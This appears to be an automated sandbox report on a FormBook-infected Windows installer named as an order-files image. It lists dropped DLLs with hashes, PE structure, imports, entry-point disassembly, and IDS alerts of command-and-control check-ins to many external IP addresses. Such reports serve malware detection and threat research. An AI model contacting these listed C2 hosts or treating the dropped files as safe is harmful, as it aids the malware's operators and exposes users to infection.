                                                                                  Preview:...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............|................................
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):131403
                                                                                  Entropy (8bit):1.2526174536345023
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
                                                                                  MD5:9AD6681DD2B309E6ACE142096F9E2870
                                                                                  SHA1:5E02434342A98589A29B7E389E88DD4C60F09A8A
                                                                                  SHA-256:576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
                                                                                  SHA-512:28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
                                                                                  Malicious:false
                                                                                  Preview:.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):407199
                                                                                  Entropy (8bit):1.2437541055056829
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
                                                                                  MD5:D2D56C0A1BC3F0AE364C30A638393597
                                                                                  SHA1:B564662188D504D42B22E18A487BF35503B87AF5
                                                                                  SHA-256:E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
                                                                                  SHA-512:2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
                                                                                  Malicious:false
                                                                                  Preview:..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):5632
                                                                                  Entropy (8bit):3.817430038996001
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                                                  MD5:549EE11198143574F4D9953198A09FE8
                                                                                  SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                                                  SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                                                  SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):5.804946284177748
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                  MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                  SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                  SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                  SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                                                                  • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                                                                  • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                                                                  • Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse
                                                                                  • Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse
                                                                                  • Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse
                                                                                  • Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse
                                                                                  • Filename: , Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):3.3415738744933092
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
                                                                                  MD5:F8B6DD1F9620BE4EF2AD1E81FB6B79FA
                                                                                  SHA1:F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
                                                                                  SHA-256:A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
                                                                                  SHA-512:F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):9728
                                                                                  Entropy (8bit):5.157714967617029
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                  MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                  SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                  SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                  SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7168
                                                                                  Entropy (8bit):5.295306975422517
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                  MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                  SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                  SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                  SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.310543946591385
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:IMG_00991ORDER_FILES.exe
                                                                                  File size:742'766 bytes
                                                                                  MD5:3e9713868f8c85ac3aea7fa6c1ae4387
                                                                                  SHA1:8c2862d76937d712b4d8cb7c891d23eda0af7abf
                                                                                  SHA256:0645a7ba3f25c2f398a13f9d0d6701e9d3602044f3045f1ca1d598e08e4cde82
                                                                                  SHA512:b575adb99ed53bfc389b64f1a2dbb81a7ac2f1f391c2be514fb5a56d0aee5d249beca1b5b933bc95b6e32329a40625c846d1145348fab1d33c09dfeee7b7ea1b
                                                                                  SSDEEP:12288:JGPWHXq5rMTaQgsv89N42v3JanklTQGMi7B1mSwIhCjVn:JGu65Kdv89e2voKTQWB1mSlCjV
                                                                                  TLSH:42F49CD1E48B901DD9F826FA0634A73ECF9B5C3438E85AED2FD736BB9AB2511214C405
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....
                                                                                  Icon Hash:4dd2d8e4e4f892cc
                                                                                  Entrypoint:0x40352f
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                  Instruction
                                                                                  sub esp, 000003F8h
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  pop edi
                                                                                  xor ebp, ebp
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+20h], ebp
                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                  mov dword ptr [esp+14h], ebp
                                                                                  call dword ptr [004080A4h]
                                                                                  mov esi, dword ptr [004080A8h]
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push eax
                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007F6120C9775Ah
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  mov ax, word ptr [esp+48h]
                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                  sub ax, 00000053h
                                                                                  add ecx, FFFFFFD0h
                                                                                  neg ax
                                                                                  sbb eax, eax
                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                  not eax
                                                                                  and eax, ecx
                                                                                  mov word ptr [esp+00000148h], ax
                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                  jnc 00007F6120C97728h
                                                                                  and word ptr [esp+42h], 0000h
                                                                                  mov eax, dword ptr [esp+40h]
                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                  mov dword ptr [007A8318h], eax
                                                                                  xor eax, eax
                                                                                  mov ah, byte ptr [esp+38h]
                                                                                  movzx eax, ax
                                                                                  or eax, ecx
                                                                                  xor ecx, ecx
                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                  movzx ecx, cx
                                                                                  shl eax, 10h
                                                                                  or eax, ecx
                                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d70000x291e8.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x66d10x68001cb1571d2754df0a2b7df66b1b8d9089False0.6727388822115384data6.4708065613184305IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x39e3780x60092e7d2d711bd61815cb4cc2d30d795b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ndata0x3a90000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x3d70000x291e80x29200cc706edee509d9ecaeb9366e623c5894False0.0645243636018237data2.7972076937156523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x3d73b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.021042825032532828
                                                                                  RT_ICON0x3e7be00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.037576203489594284
                                                                                  RT_ICON0x3f10880x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.05318853974121996
                                                                                  RT_ICON0x3f65100x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.04127302786962683
                                                                                  RT_ICON0x3fa7380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08018672199170125
                                                                                  RT_ICON0x3fcce00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09709193245778612
                                                                                  RT_ICON0x3fdd880xd29PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9076877411694865
                                                                                  RT_ICON0x3feab80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.18442622950819673
                                                                                  RT_ICON0x3ff4400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.225177304964539
                                                                                  RT_DIALOG0x3ff8a80xb8dataEnglishUnited States0.6467391304347826
                                                                                  RT_DIALOG0x3ff9600x144dataEnglishUnited States0.5216049382716049
                                                                                  RT_DIALOG0x3ffaa80x100dataEnglishUnited States0.5234375
                                                                                  RT_DIALOG0x3ffba80x11cdataEnglishUnited States0.6056338028169014
                                                                                  RT_DIALOG0x3ffcc80x60dataEnglishUnited States0.7291666666666666
                                                                                  RT_GROUP_ICON0x3ffd280x84dataEnglishUnited States0.7348484848484849
                                                                                  RT_VERSION0x3ffdb00x1a8dataEnglishUnited States0.5660377358490566
                                                                                  RT_MANIFEST0x3fff580x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625
                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                                                  2024-08-27T17:49:38.600561+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984980192.168.11.20199.59.243.226
                                                                                  2024-08-27T17:47:24.671410+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981880192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:49:25.365375+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984580192.168.11.203.33.130.190
                                                                                  2024-08-27T17:47:12.797775+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514981580192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:47:12.797775+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214981580192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:48:03.892087+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514982780192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:48:03.892087+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214982780192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:47:41.623663+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982080192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:47:49.912809+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514982380192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:47:49.912809+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214982380192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:49:22.720571+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984480192.168.11.203.33.130.190
                                                                                  2024-08-27T17:51:18.155260+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987380192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:49:43.875794+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514985180192.168.11.20199.59.243.226
                                                                                  2024-08-27T17:49:43.875794+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214985180192.168.11.20199.59.243.226
                                                                                  2024-08-27T17:47:18.966070+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981680192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:46:51.220148+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314980880192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:51:15.514252+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987280192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:48:31.702585+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983280192.168.11.203.82.56.39
                                                                                  2024-08-27T17:48:48.385538+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983780192.168.11.20172.96.191.39
                                                                                  2024-08-27T17:50:47.261723+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514986780192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:50:47.261723+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214986780192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:51:00.948919+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986880192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:50:11.511466+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985680192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:49:04.751068+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984180192.168.11.20148.135.49.178
                                                                                  2024-08-27T17:48:51.261825+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983880192.168.11.20172.96.191.39
                                                                                  2024-08-27T17:51:06.465760+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987080192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:50:24.823365+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986080192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:49:35.962800+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984880192.168.11.20199.59.243.226
                                                                                  2024-08-27T17:48:01.183325+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982680192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:48:39.624597+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514983580192.168.11.203.82.56.39
                                                                                  2024-08-27T17:48:39.624597+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214983580192.168.11.203.82.56.39
                                                                                  2024-08-27T17:48:54.126206+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514983980192.168.11.20172.96.191.39
                                                                                  2024-08-27T17:48:54.126206+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214983980192.168.11.20172.96.191.39
                                                                                  2024-08-27T17:50:38.716431+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986480192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:49:30.629004+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514984780192.168.11.203.33.130.190
                                                                                  2024-08-27T17:49:30.629004+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214984780192.168.11.203.33.130.190
                                                                                  2024-08-27T17:49:01.170461+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984080192.168.11.20148.135.49.178
                                                                                  2024-08-27T17:51:37.140534+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514987980192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:51:37.140534+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214987980192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:47:21.852343+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981780192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:50:03.472155+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985480192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:46:59.134782+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514981180192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:46:59.134782+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214981180192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:51:31.627647+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987780192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:47:27.522168+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514981980192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:47:27.522168+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214981980192.168.11.2038.47.207.120
